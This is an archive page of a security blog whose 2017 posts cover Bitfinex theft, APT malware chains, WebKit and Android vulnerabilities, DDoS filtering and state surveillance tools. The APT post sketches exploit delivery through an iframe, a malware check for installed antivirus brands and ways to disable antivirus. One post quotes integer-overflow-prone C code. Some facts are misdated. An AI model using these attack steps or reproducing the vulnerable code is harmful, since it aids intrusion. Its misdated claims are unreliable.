Category Archives: Cell Phone (iPhone, Android, windows mobile)

Application Development, Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

Part 2:Blockchain technology situation – Malware join to bitcoin mining

838 Comments 
A moment of silence, prayer for the dead (Terrorist attack on the streets attack near U.K. Parliament 22nd Mar 2017)

A moment of silence, prayer for the dead 
Tragedy in Russia - Explosion in the St. Petersburg metro 3rd Apr 2017

Part 2: Blockchain technology situation – Malware join to bitcoin mining

We continuous the discussion topic on blockchain technology situation.  Part 1:Blockchain technology situation – A Tales of Two Cities The discussion on part 2 mainly focus on malware threats to bitcoin industry.  We understand that Bitcoin was designed to be uncensorable digital cash that could operate outside the existing financial system. As mentioned last time, it looks that the blockchain technology contained weakness on end point device (bitcoin owner workstation or mobile phone). Even though you deploy a proprietary wallet, the overall setup will become weakness once malware compromise your end point device. Below picture diagram bring an idea to reader of bitcoin wallet architecture, see whether you have different idea in this regard?

Bitfinex incident wakes up concern on endpoint security

More than US$60m worth of bitcoin was stolen from one of the world’s largest digital currency exchanges (Bitfinex) on 2nd Aug 2017. Nearly 120,000 units of digital currency bitcoin worth about US$72 million was stolen from the exchange platform Bitfinex in Hong Kong, said Reuters Technology News. Director of Community & Product Development for Bitfinex stated that the bitcoin was stolen from users’ segregated wallets. The investigation has found no evidence of a breach to any BitGo servers, said the representative of BitGo.

Since no evidence proof that security breach happened in that place but what is the possible cause?

An announcement posted by official group (Bitfinex), the company informed that there are going to secure the environment and bring down the web site and the maintenance page will be left up. From technical point of view, if  API and signing keys reside on servers. Hacker might have access with legitemate credential once a bitcoin wallet user workstation compromised.As a matter of fact if the webservice is hacked, bitcoin owner will lost the money (see above bitcoin wallet architecture comparison diagram for reference).

Our Observation

The weakness of Node.J.S trading API Framework.

The java script contain security weakness. It benefits hacker to understand the operation path. For instance

Client send his payload, his key, and the hmac of his payload with his secret key. Server retrieve user with his pk, recompute the hmac with the retrieved sk and then check if the computed hmac is equal to the retrieved hmac. (see below program syntax for reference).

 

From technical point of view, malware which contains steal private key or digital certificate function, they have capability transform to bitcoin malware. As usual, the infection technique relies on Spear phishing. The emails contained a malicious attachment with the file which contained a zero-day exploit. The exploit attacked multimedia software platform used for production of animations especially Adobe Flash to install a malware onto the victim’s computer.

Then malware obtained bitfinex private key and one of the following item.

i) bitgo’s private key

ii) bitfinex bitgo’s username and password and authy’s credentials (that allows the hacker to create new api access tokens and remove daily limits)

iii) bitfinex bitgo’s api access token

Or apply new keys gave to bitgo as new 2-3 internal bitfinex address. signed tx with bfx key, and “new key” that was just given. Meanwhile bypassing bitgo’s security checks.

Summary:

Above information detail is one of the example. It looks that quote a real incident can increase the visibility of the understanding.  Apart from that, discussion looks never ending. I believed that part 3 will be coming soon.

 

 

 

Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

Advanced Persistent Threat (APT) miscellaneous outline

870 Comments

For the first time I heard the “Advanced Persistent Threat”, which, for me, was a hostile conspiracy between nations. Famous network events (see below) as proof of concept. What is the purpose of announcing the APT to the world?

2010 – The Stuxnet (ATP) is believed by many experts to be a jointly built American-Israeli cyber weapon,although no organization or state has officially admitted responsibility.

2011 – Defence contractor Lockheed Martin hit by advanced persistent threat to network (specifically related to RSA’s SecurID two-factor authentication products)

2011 – APT28 has used lures written in Georgian that are probably intended to target Georgian government agencies or citizens.

2013 – APT28 Targeting a Journalist Covering the Caucasus

2013 – Kimsuki malware (APT) targets critical infrastructures and Industrial control system (ICS) in South Korea

2013 – In February 2013, Mandiant uncovered Advanced Persistent Threat 1 (APT1).Alleged Chinese attacks using APT methodology between 2004 and 2013

*2014 – BlackEnergy APT group re engineer the black energy DDOS software. Deploy SCADA‐related plugins to the ICS and energy sectors around the world.

2015 – In August 2015 Cozy Bear was linked to a spear-phishing cyber-attack against the Pentagon email system causing the shut down of the entire Joint Staff unclassified email system and Internet access during the investigation. (Cozy Bear, classified as advanced persistent threat APT29)

2016 – Onion Dog, APT focused on the energy and transportation industries in Korean-language countries

APT (Advanced Persistent Threat) design definition

It is flexible and sustainable platform, demonstrating long-term use and versatility planning.

The common APT kill chain criteria (see below diagram for reference)

However, APT 28 runs differently. A complete attack scenario with APT28 has multiple malware stages, such as Sourface/Coreshell, Eviltoss, and Chopstick. APT28 malware could persuade a trusted user to open a malicious document that includes a Sourface downloader, which downloads the Chopstick second-stage malware. We believe that hacker use the spare phishing technique.

Terminology for reference:

CORESHELL:This downloader is the evolution of the previous downloader ofchoice from APT28 known as “SOURFACE” (or “Sofacy”). This downloader, once executed, create the conditions to download and execute a second-stage(usually Eviltoss) from a C2.
EVILTOSS: This backdoor is delivered through CORESHELL downloader to gain system access for reconnaissance, monitoring, credential theft,  and shellcode execution
CHOPSTICK: This is a modular implant compiled from a software framework that provides tailored functionality and flexibility. By far Chopstick is the most advanced tool used by APT 28.

 

MIMIKATZ: Everyone of us knows this tool. In this case, this has been of devastating effects to completely compromise AD Forest

Fileless APT malware

MM Core APT: MM core is a file-less trojan

Trojan.APT.BaneChant targeted Middle Eastern and Central Asian organizations. The trojan is file-less, downloading its malicious code to memory to prevent investigators from extracting the code from the device’s hard drive.

Primary objective for advanced persistent threat

There are 2 different of objectives for advanced persistent threat till today.

Objective 1: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. The intention of an APT attack is to steal data rather than to cause damage to the network or organization.

Objective 2: An advanced persistent threat (APT) is a set of stealthy and continuous computer hacking processes which targeted the computer hardware of nuclear facilities. The obj of the attack is try to suspend the services or mess up the operation causes destruction.

Infiltration outline
A typical scenario shown as below:
1. Attackers rename the exploit (say Titanium.zip, which takes advantage of a ZIP parsing vulnerability of the antivirus) to Titanium.wmf
2. Hold a webpage which contains <iframe src = Titanium.wmf>
3. Convince victims to visit this webpage.
4. While victims are browsing webpages, iron.wmf would be downloaded onto the victims’ computers automatically, without any user interaction.
5. If the auto-protect of the antivirus is on, the antivirus engine would parse Titanium.wmf  automatically, and then possibly get compromised immediately.
Detect: To perform a number of checks for installed security products on the victim machine. Check entries within the HKLM\Software\ registry path
The antivirus product represented by a value that is binary which might hints malware which brand of anti-virus install in victim machine (see below example):

0x08000000 : Sophos
0x02000000 : INCAInternet
0x04000000 : DoctorWeb
0x00200000 : Baidu
0x00100000 : Comodo
0x00080000 : TrustPortAntivirus
0x00040000 : GData
0x00020000 : AVG
0x00010000 : BitDefender
0x00008000 : VirusChaser
0x00002000 : McAfee
0x00001000 : Panda
0x00000800 : Trend Micro
0x00000400 : Kingsoft
0x00000200 : Norton
0x00000100 : Micropoint
0x00000080 : Filseclab
0x00000040 : AhnLab
0x00000020 : JiangMin
0x00000010 : Tencent
0x00000004 : Avira
0x00000008 : Kaspersky
0x00000002 : Rising
0x00000001 : 360

FINGING VULNERABILITIES OF ANTIVIRUS
Basically there are four kinds of vulnerabilities seen in antivirus software:
Local Privilege Escalation
ActiveX-related
Engine-based
Management (Administrative) interface

KILL THE LOCAL ANTIVIRUS PROGRAM

For instance, A zip bomb, also known as a zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software.

Find zero day vulnerability compromise on victim workstation

The implant successful rate all depends on the patch management status on the workstation.

APT Malware callback

In order to avoid malware analyzer (FireEye, RSA ECAT) detect the malware callback to external CnC server. APT malware will compromise the legitimate website and then redirects the communication to the CnC server. This method can prevent malware analyzer deny the traffic to external command and control (C&C) servers.

Data Theft

The malware collects data on a victim host, then exfiltrate the data off the network and under the full control of the hacker. Hacker will erase all evidence after job complete. Since the host is compromised and therefore he can return at any time to continue the data breach.

Observation on 2017 1st quarter

Regarding to the consolidation of APT incidents, analysis reports so far.  It looks that the most efficient way to avoid APT incident happen is install a malware analyzer (FireEye, RSA ECAT) in your IT network campus. As a matter of fact, APT technique is a  advance technology which develop by country or technology group and therefore the greater possibility can break through End point defense mechanism. For instance antivirals program. However my comment is that Kaspersky is a prefect antivirus and malware defense vendor. May be he is one of he exception. However client might concern the company background (A group of developer from Russia). As we know, home users not possible to install the malware analyser. As such, I would suggest end user consider their decision when they are going to purchase antivirus program. Below matrix table not precise but can provide an idea to you which component is a the bottle neck to against APT attack.

APT (advanced persistent threat) kill chain relationship matrix table

Phase Detect Deny Disrupt Degrade Deceive Destroy
Reconnaissance 1. Managed security services
2. IDS
3. SIEM		 Firewall
Weaponization End point defense (antivirus) End point defense (antivirus) queuing and loading
Delivery SIEM Proxy Srv End point defense (antivirus)
Exploitation malware analyzer Vendor Patch End point device
Installation End point defense (antivirus) malware analyzer 1. End point device
2. Malware analyzer
C2 1. malware analyzer
2. SIEM		 malware analyzer malware analyzer DNS redirect
Actions 1. malware analyzer
2. SIEM		 malware analyzer
Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

Apple icloud security burden – Webkit looks like a culprit! (Mar 2017)

1,015 Comments

Apple developers work hard on  iCloud security to improve the security. They are in an effort to encourage adoption of the two factor authentication standard. Since Apple device did a good job in end point device so far. And therefore it such a way reduces of inherent risks. However it is hard to avoid the vulnerability happen on application side since development source code is open. Apart from that it is hard to refuse the open source application deployment.

As we know a Apple release security patches on 23rd Jan 2017, a common vulnerability criteria focus on a web component. Yes, it is WebKit. Let start the story from scratch.  Be my guest. Let’s start the journey!

Why Use WebKit?

Some applications are full-featured browsers, but more often applications embed web content as a convenience, as in a custom document system. WebKit is a layout engine software component for rendering web pages in web browsers.

Since found a flaw on WebKit,  a rogue web page can crash the browser because all code runs in the same process. New version of webkit (Webkit2) enhance Safari architecture. It aim to avoid this design limitation. It enforce to separate the code into two different processes. That is User Interface and web page process maintain their specify process. Below detail shown that how Webkit 2 architecture improve the Safari process isolation feature.

 

As times goes by, Webkit features like a major component embedded in web browser (see below).

However it bring up cyber security world concern on 2012. A heap memory buffer overflow vulnerability exists within the WebKit’ JavaScriptCore JSArray::sort(…) method.

This design limitation accepts the user-defined JavaScript function and calls it from the native code to compare array items.
If this compare function reduces array length, then the trailing array items will be written outside the “m_storage->m_vector[]” buffer, which leads to the heap memory corruption. At this time, you may ask, does the webkit or webkit 2 design flaw only apply to Apple devices? I believe that it apply to all different brand name of vendors which make use of webkit or webkit2.

The exploit was due to an heap buffer overflow issue in JavaScriptCore JSArray::Sort() method. Below details of program syntax will bring you an idea in this regard.

Cyber attack transformation = Attack from local device to Virtual server machine.

Hacker looks exploits the vulnerability of WEBKIT, a weakness hints that hacker can transform the ROP(return oriented programming) as attack weapon. A technical article published by IEEE records the following scenario.

Important: An approach to attack on the Xen hypervisor utilizing return-oriented programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged or not and thus can escalate the privilege of an unprivileged domain (domU) at run time. As ROP technique makes use of existed code to implement attack, not modifying or injecting any code, it can bypass the integrity protections that base on code measurement. By constructing such kind of attack at the virtualization layer.

Sounds horrible on above matters! Why? If such hacker technique develop in advance. So the virtual machine run on cloud farm will become a victim.  Hey, same scenario looks possible happened in iCloud. The side effect is that it is not only compromise a single icloud container (single device), it effect the whole unit of icloud. Below IEEE technical article highlight is the proof of concept. If you are interest, please do a walk-through of this document highlight. I am afraid that this article might have copyright. And therefore not going to copy all the articles. Should you have any interest, please visit IEEE publisher web site to find out more.

A rumour concerning “rumblings of a massive (40 million) data breach at Apple.” Believe it or not? In the meantime, if you are the apple fans, you must re-confirm all the patches provided by Apple Corp.  Keep run don’t stop! For more details, please refer to below url for reference.

Reference:

iCloud for Windows 6.1.1

The latest software updates from Apple

 

 

 

 

 

 

 

 

 

 

 

Application Development, Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

DDOS never expire! A powerful tool for political and economic weapon (Part 1)

739 Comments

We heard DDOS term till 80’s. The foundation of attack given from network layer (OSI layer 3) till today application layer (OSI layer 7). Since 2010 a mobile computing trend leads BYOD (Bring your own device) terminology and carry out more serious distribution denial of services. A public DNS incident occured last year (2016) exposed IoT type style distribution denial of services. If you still remember , security expert forseen that ransomware  is going to replace DDOS soon. It looks that the statement not totally correct.  The truth is that cyber arsenal virtually categorizes the weapons into different categories (see below).

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
End user computing
 1. DDOS (SYN Flood)
2. DOS (SYN Flood)		 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (UDP Flood)
2. DOS (UDP Flood)
 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (ICMP Flood)
2. DOS (ICMP Flood)		 Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Web applications vulnerabilities
2. DOS attack focused on Web applications vulnerabilities		 Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Operating system vulnerabilities
2. DOS attack focused on Operating system vulnerabilities		 Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
Compromised web site, email phishing attached with file or url embedded malicious code Application layer (files and OS) – Attack trigger by ransomware which cause files lock (encrypted) 1. Operating system and files
2. End user computing		 Bitcoin (money) Bring disruption to satisfy objective (focus on business world instead of political reasons)

Information supplement (BYOD and IoT)

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
BYOD (mobile phones) Botnet – so called vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
IoT (Internet of things includes, web cam, car automation, home appliance, Smart TV and smart electronics device) IoT (Botnet) – so called descendant of vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)

Yes, this topic might bring interests to reader. Ok, let’s join together to this journey (DDOS never expire – A powerful political and economic weapon (Part 1)).

Is there a way to identify attacker traffics? Yes, it can but it seems out of control now! BYOD and IoT technology are the accomplice!

As far as we know, the earlier stage of DDOS and DOS attack keen to make use of random source to increase the difficulties of the defense. A technical term so called Random Spoofed Source Address Distributed Denial of Service Attack (RSSA-DDOS)

Let recall different types of avoidance mechanism to avoid classic DDOS. There are total 3 types of filter can avoid classic DDOS happened on network layer.  For more details, please see below:

  1. Ingress filtering
  2. Egress filtering
  3. Router-based filtering

However above 3 types of prevention mechanisms not able to avoidance of RSSA-DDOS. The drawback is that those solution encounter difficulties to distinguish between legitimate traffic and attack traffic in effective way.

Dawn appears only for short time (FSAD & ECBF)

Filtering based on the source address distributed feature – FSAD

Solution:

  1. Detection of attack occurred and according to the current attack scale, historical flow and source address recognition accuracy requirements. Set the appropriate legal address identification
    parameter.
  2. 2. Identify the legal source address and saved to the legal address table (LAT)

But how to identify the counterfeit source IP address

A solution named “The Extended Counting Bloom Filter -ECBF” can do the magic.
Example:
Assuming that a packet is received, the source address Saddr is (a.b.c.d) > 1.1.1.1
The source address Saddr is (a.b.c.d), then

• IPH(Saddr)=256×a+b;
• IPM(Saddr)=256×b+c;
• IPL (Saddr)=256×c+d;
• IPLH(Saddr)=256×d+a.

The ECBF contains four hash codes for counting the number of source address packets number and array. Each array corresponds to a hash function (see below)

It is easy to see that each element of the ECBF corresponds to 2 16 source addresses. For example, the 257th cell of the A 1 array corresponds to the source address (1.1.x.y)
According to the packet, where x and y are any number between 0 and 255. And each time a packet is received, the four cell values corresponding to the packet source address
Then add 1 for A 1 [256 × a + b], A 2 [256 × b + c], A 3 [256 × c + d] and A 4 [256 × d + a], respectively.
 See below diagram will receive a high-level understanding.
Legitimate address identifying algorithm under random spoofed source address DDoS attacks (see below):
Set identifying time interval and threshold T;
while(1)
Receive a packet;
Get source ip address sip;
Record sip in ecbf;
If (every element’s value of sip in 4 arrays>T)
Sip is a legitimate address;
fi;
if (time interval is over)
Empty 4 arrays;
Start a new time interval;
fi;
End while;
 IoT Botnet appears then triggers DDOS make the Cyber world crazy!
Above filter base defense mechanism and integrity identification method looks insufficient when IoT Botnet join to cyber war. Recently headline news stated that Mirai botnet turning internet of things into botnet of things. See how serious of this attack effected cyber world!
Mirai botnet on volume amount basis break through advanced defense mechanism. It look likes a cyber soldiers listen to the instruction of C&C server to attack the enemy. As a matter of fact, the cyber incident historical record last year proven that above imagination not a assumption. This is a real story.
References:
Oct 2016 – Dyn cyberattack: the attack involved “10s of millions of IP addresses (DDOS suspects – Mirai)
2016 – A massive DDoS cyber attack that disabled many online sites during the American presidential election (DDOS suspects – unknown)
2017 – The citizens of Hong Kong looking for True, Fair & Free Election, however the democratic websites operate in frequently encountered DDOS during important events (DDOS suspects – unknown)
Above 3 items of incident can tell us DDOS attack never expire. Sounds like the attack is under transformation. DDOS attack from begin focus on commercial world expands to other non commercial area. The attacks methodology enhance by internet of things and become powerful. The additional target added foreign government and democratic world.

 

Since this discussion overtime and looks bulky. Let’s continue our discussion on Part 2 next time (DDOS never expire! A powerful tool for political and economic weapon). Stayed tuned.

 

 

 

 

 

 

 

 

 

Cell Phone (iPhone, Android, windows mobile)

voyeur vs surveillance – immoral or civil governance

769 Comments

Nowadays, CCTV, webcam or even though your mobile phone camera looks involves in our life daily. Seems that the surveillance behavior is following with us once we are born on the earth. The reflections of my thinking of CIA scandal. What is the exact scandal?

Immoral or civil governance

As said, the surveillance behavior is following with us once we are born on the earth.  For instance, mum look after their child, take care of their home work and daily life. From technical point of view, such behavior looks normal without any comments said that this is governance. From technical point of view, it looks that it got the similarity of action. But for sure that this is moral.

How to identify it is an immoral action. For instance, become a voyeur. Under non criminal investigation situation, sniffing ,recording and voyeur are immoral behavior.

Wikileak document subject Vault 7: CIA Hacking Tools Revealed information bring to my attentions. Especially CIA malware targeted on smart TVs. Since the jailbreak techniques on iPhone, Android and electronic games are common. Heads up that even though SmartTV, the jailbreak on Samsung TV are the hot topics.

The interesting thing is that the jailbreak techniques covered in smartTV model deploy in hospitality  industry. It make sense to me that jailbreak for personal TV might have personal interest to enjoy more benefits but for sure that it is unsafe. However for the enterprise hospitality group it was not possible to populated a illegal feature since enterprise firm not going to take the risk. So what is the goal of this jailbreak tool?

On this discussion , I am not going to discuss the source code which I found since this is a hot topics. You can find the information anywhere. For your easy to find out the related information. Please visit below url:

https://wikileaks.org/ciav7p1/cms/page_12353643.html

Recommendation:

It is a better idea that check the brand of the smart TV installed in hotel after check in. May be you will enjoy your business or travel trip more , right?

 

 

 

Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

The culprit of the CIA’s global covert hacking program given from SS7 design limitation

904 Comments

Headline news today provides a 2nd round of reminder to the world that we are under surveillance.  Since our hero Edward Snowden heads up to the world earlier. As a result, he such a way may carry a crime of treason. To be honest , I am a little worry about of him. The fact is that the expectation of president in united stated has been changed. Good luck to him at all! If god is present, please give your son Edward’s assistance. He really need you help!

The no. of total 8761 documents posted on wikileak we are not going to discuss here. Just know this is the first full part of the series dubbed Year Zero. However we would like to bring your attention on the weakness of tel-comm industry today. And believed that this is the root causes or you can say this is a backdoor on telecommunication world. Ok, this time all we emulate as Sherlock Holmes. Let’s start.

Speculation

  1. Flaw found in ASN.1 compiler

Abstract Syntax Notation 1 (ASN.1) background:

Quick and dirty description:

In the field of telecommunications and computer networks, ASN.1 (Abstract Syntax Notation One) is a set of standards describing data representation, encoding, transmission and decoding flexible notation. It provides a formal, unambiguous and precise rules to describe independent of the specific computer hardware object structure. ASN.1 provides application and protocol developers a high-level tool, essentially a data-definition language, for defining protocol syntax and the information that an application exchanges between systems.

Vulnerability:

A flaw discovered in an ASN.1 compiler, a widely used C/C++ development tool, could have propagated code vulnerable to heap memory corruption attacks, resulting in remote code execution.

Heap memory corruption attacks

Traditional memory corruption exploit can be achieved by pointing to the injected code on the stack or heap which data resides in.

Technical information – vulnerability details

Vulnerability Note VU#790839
Objective Systems ASN1C generates code that contains a heap overflow vulnerability, for more details, please refer to below url for reference.

https://www.kb.cert.org/vuls/id/790839

Afterwards, the government agency relies on this design weakness of SS7 to track the movements of the mobile phone user anywhere in the world. From technical point of view, compromise of WhatsApp or Telegram was not direct way. Sometimes no need to install malware to the clients mobile phone. It is exact the abuses of SS7 weaknesses.

2. TCP/IP version 4 (CVE-2016-5696)

The difficult part for hacker taking over TCP connection is to guess the source port of the client and the current sequence number. A group of researchers found that open a connection to the server and send with the source of the attacker as much “RST” handshake packets with the wrong sequence mixed with a few spoofed packets. By counting how much “challenge ACK” handshake packet get returned to the attacker side.  Attacker might knowing the rate limit one can infer how much of the spoofed packets resulted in a challenge ACK to the spoofed client and thus how many of the guesses where correct. This way can quickly narrow down which values of port and sequence are correct.

 

3. Law enforcement backdoor software overview

Edward Snowden disclosed global surveillance program in 2013. We all alert that surveillance programs are flooding all around the world. Bring to tech guy attention may more or less is the sniffing technique. How was US government collect personal data and telephone call on our desktop and mobile phone devices? Tech guy with interest on cyber securities may know few hacker group assists law enforcement sector develop monitoring agent software. The brand name includes DaVinci, Morcut, Crisis & Flosax. It looks that the most famous product is the DaVinci. An Italian made surveillance software best perform a lot of actions, such as hidden file transfers, screen capturing, keystroke logging & process injection.

Interest story happened on July 2015

A cyber-surveillance company believes a government may have been behind a massive hack of its systems that saw huge chunks of its code stolen. For more details, please refer to below URL:

http://eandt.theiet.org/news/2015/jul/hacking-team-breach.cfm

After you read  this article, you may have questions? Since 2015 data breaches incidents happened in frequent. It is hard to believe that how weakness of cyber defense setup in the world. No matter how many anti defense facilities you built in your firm. Seems there is no appropriate solution to fight against cyber crime. Do you think all the incidents happened within 2015 to 2016 are related hacker code exposed in July 2015?

Reference:

Law enforcement surveillance software technical features:

Available surveillance modules
Accessed files
Address Book
Applications used
Calendar
Contacts
Device Type
Files Accessed
Keylogging
Saved Passwords
Mouse Activity (intended to defeat virtual keyboards)
Record Calls and call data
Screenshots
Take Photographs with webcam
Record Chats
Copy Clipboard
Record Audio from Microphone
With additional Voice and silence detection to conserve space
Realtime audio surveillance (“live mic:” module is only available for Windows Mobile)
Device Position
URLs Visited
Create conference calls (with a silent 3rd party)
Infect other devices (depreciated since v. 8.4)

Suggestion to reader:

Since the world situation became more complex today no matter political and people’s livelihood. A solution will let you easy to know your mobile phone status. Are you under government surveillance program?

If you are android phone user, go to playstore download a free program names SnoopSnitch. The SnoopSnitch which can warn when certain SS7 attacks occur against a phone and can detect voyeur’s jump into your phone.

Bye!

 

 

 

 

Cell Phone (iPhone, Android, windows mobile)

Heard that Android operating not secure anymore, but it is properly not.

166 Comments

Android phone users widely cover up mobile phone market. We understand that no hack proof devices in the world. Even though iphone iOS before 10.2.1 is vulnerable to DoS Exec Code Overflow (CVE-2017-2370). As a Android user we are not surprise Android operation system bug.  There are 2 critical bug occurs on mediaserver and surfaceflinger. A bug was found on 2014 identify that a potential memory leak in SurfaceFlinger on Android 4.4.4. Memory leak due to not complete designed or programmed applications limitation that fail to free up memory segments when they are no longer needed. Since this is design fault (bug), as time goes by bug become a vulnerability found by security expert last month. The CVE alert that attacker is able to use a specially crafted file to cause memory corruption during media file and data processing on Android 7.0. Apart from that, media server found new vulnerability. Such vulnerability also affects the libhevc library. As far as we know, to improve device security on Android 7.0. Andriod breaks up the monolithic mediaserver process into multiple processes with permissions and capabilities restricted to only those required by each process. However a design weakness causes the vulnerability located in the function that created the native handle. When passing in well-structured numFds and numInts (such as numFds = 0xffffffff, numInts = 2) to native_handle_create, you can cause the expression “sizeof (native_handle_t) + sizeof (int) * (numFds + numInts)” Integer overflow.

Below code is a proof of  concept shown that each GraphicBuffer object contains a pointer to a native handle.

native_handle_t* native_handle_create(int numFds, int numInts)
{
native_handle_t* h = malloc(
sizeof(native_handle_t) + sizeof(int)*(numFds+numInts));//———->Integer overflow position

h->version = sizeof(native_handle_t);
h->numFds = numFds;
h->numInts = numInts;
return h;
}

For details about vulnerabilities on Android. Please refer to below url for reference.

https://source.android.com/security/bulletin/2017-02-01.html

We heard that the overall comment on Android phone is not secure any more! As a matter of fact, design fault and design limitation are the element of the result. Since no prefect product was made in the world. Even though you put more time in development and staging phase can’t avoid a design fault occurs in your product. Yes, agree, shorten the development life cycle will hits the design fault encounter in frequent way. However modern mobile phone world integrate with Multi-application and functions. Sometime a 3rd party application will integrate into your mobile phone. Thus Andriod 7 contains defense mechanism to protect memory space and Kernel environment. But what is the fact causes the operating system still vulnerable? Ok, Let go together on this journey to elaborate more techincal details in this regard.

The evolution of Android 7.0

Android 7.0 includes a variety of system and API behavior changes.

Battery and Memory
Background Optimizations
Permissions Changes
Sharing Files Between Apps
Accessibility Improvements
NDK Apps Linking to Platform Libraries
Check if your app uses private libraries
TLS/SSL Default Configuration Changes

On above feature enhancement, it looks that the improvement on new version of Android looks fine.  As said, no prefect product design in the world.  On the other way of thinking, what if we become a hacker. On above items, which part will become vulnerable or weakness let attacker compromise the phone?

Observational standpoint:

Point 1: (Sharing Files Between Apps)

Regarding to technical details written on technical documentation. For apps targeting Android 7.0, the Android framework enforces the StrictMode API policy that prohibits exposing file:// URIs outside your app. If an intent containing a file URI leaves your app, the app fails with a FileUriExposedException exception. To share files between applications, you should send a content:// URI and grant a temporary access permission on the URI. The easiest way to grant this permission is by using the FileProvider class.

Side effect of Point 1 – Hacker can make use of File Provider class feature try to dig out the mobile phone data. The easy way is embedded a malicious program script in 3rd party application.  Fool the user to click the button (accept sharing files between apps) during software installation. Since many mobile phone users are smart today, but still have many people fall down to this trap.

Point 2: (Memory)

Both the Android Runtime (ART) and Dalvik virtual machine perform routine garbage collection, this does not mean you can ignore when and where your app allocates and releases memory. Software designer need to avoid introducing memory leaks, usually caused by holding onto object references in static memory variables, and release any Reference objects at the appropriate time as defined by lifecycle callbacks.

Side effect of Point 2 – The easiest way to leak an Activity is by defining a static variable inside the class definition of the Activity and then setting it to the running instance of that Activity. If this reference is not cleared before the Activity’s lifecycle completes, the Activity will be leaked. So all depends on mobile apps developer design. It is hard to avoid memory leak. As you know, what is the defect of memory leak? Hacker relies on this error can implant malware.

Point 3: (Background Optimizations)

ART (Android run-time)

Starting with Android 5.0, Android Runtime (ART) replaces Dalvik as the default virtual machine in the system.

 

Reference: The Dalvik Virtual Machine (Dalvik VM)

The Android platform leverages the Dalvik Virtual machine (Dalvik VM) for memory, security, device, and process management. Application designer can think of the Dalvik VM as a box that provides the necessary environment for you to execute an Android application sans, and therefore not to worry about the target device (mobile phone system).

Side effect of Point 3 – ART became the default runtime. While Dalvik relies on interpretation and just-in-time compilation, ART precompiles app Dalvik bytecode into native code.  The command responsible for compiling an application into OAT is dex2oat, which can be found in /system/bindex2oat. All mobile apps will be compiled every time the device’s system is upgraded or the first time it is booted up after it is purchased. So attacker might have way to use dex2oat to generate OAT files from modified versions of installed apps or system frameworks and replace the original OAT files with them. This is the famous attack hiding behind Android Runtime. Yes, compile method sounds like jail break of the mobile phone device. Even though iPhone can’t avoid. And therefore I still believe Android security not such poor because no products on the market can say it is hackproof.

Remark: Did you heard that hacker prepare scam email lure the user to upgrade their Android phone. It is the similar case which bring with my concerns.

Reference: Critical vulnerabilities on iPhone and Android found on Feb 2017.

Apple » Iphone IOS
score Publish Date Update Date
CVE-2017-2370 9.3 DoS Exec Code Overflow 2017-02-20 2017-02-22
CVE-2017-2360 9.3 DoS Exec Code 2017-02-20 2017-02-22
Andriod OS
CVE-2017-0405 9.3 Remote code execution vulnerability in Surfaceflinger 2017 2017 Feb
CVE-2017-0406, CVE-2017-0407 9.3 Remote code execution vulnerability in Mediaserver 2017 2017 Feb

Summary:

If people tell you that a new mobile device is excellent, less vulnerabilities found. It is a perfect design. Even though he is the best at this moment. But believed that it is hard to maintain the glory in the long run. Why, because of today business on demand business strategy. If you heard that Android operating not secure anymore, but it is properly not.

 

 

Application Development, Cell Phone (iPhone, Android, windows mobile), System

Mobile Financial App inflicts more contradiction on cyber security – part 1

862 Comments

When you pick up your mobile phone daily, no one will be care of your data privacy in highest priority. Since you are busy with your social media apps (Whatapps, Facebook, Instagram..etc). As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. Yes, this is not a hot news. My friend believed that his phone is secure since he installed anti-virus program. As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. May be you feel that it is not a critical issue once anti-virus program installed. From technical point of view, it looks correct because anti-virus will monitor malicious activities and quarantine the suspicious activities.

As a general user point of view, we all trusted the mobile financial apps issued by Bank. Do you think it was enough that install a virus protection software and do the mobile patch management. It will resolve all the problems. Regarding to this question, below table can provide an overall idea in this regard. It looks that some component had their own fundamental design limitation.

Compare with traditional non visualization computer architecture, smart-phone memory resources usage brings security concerns to subject matter expert. Apart from this, MIDP (mobile information device profile) carry out trusted relationship concerns of mobile phone applications.

It looks that tons of security concerns carry out on mobile finance software application. But what is the factors let financial institution keep going to this path but don’t take a U turn?

This questions looks everybody can answer? We are living on the earth and it is a demanding atmosphere. The traditional retail banking environment can’t survival on traditional banking product. Besides, labor cost, shop rental fees are count in bankers mind. The bankers think e-business can give assistance. And therefore a electonic technology similar as flooding to change the traditional world was born.

Information security value?

A joke told us that business man did not have key term information security in their mind until tragedy happen. As times goes by, mobile banking technology become a main trend today. Even though a small shop in village from China also accept mobile payment. But what is the value of information security no one can answer today especially bankers! Because if someone put information security on top priority means the efficiency of business developement will slow down. But who have guts to carry this burden ask the management board return to twenty years ago technology?

What is the possibility or hit rate on malware infect mobile phone?

A technology term bring your own device (BYOD) means you are the owner of the device. If an cyber incident occurs on your phone, it is really a sophisticate scenario. As we know, mobile phone system architecture operate on top of virtual machine environment. For sure that the web browsing activities on your mobile phone more intensive compare to your home workstation. Since it is a mobile device, your mobile phone will able to access mobile hot spots anywhere. It increase the attack surface for hackers execute the attack.

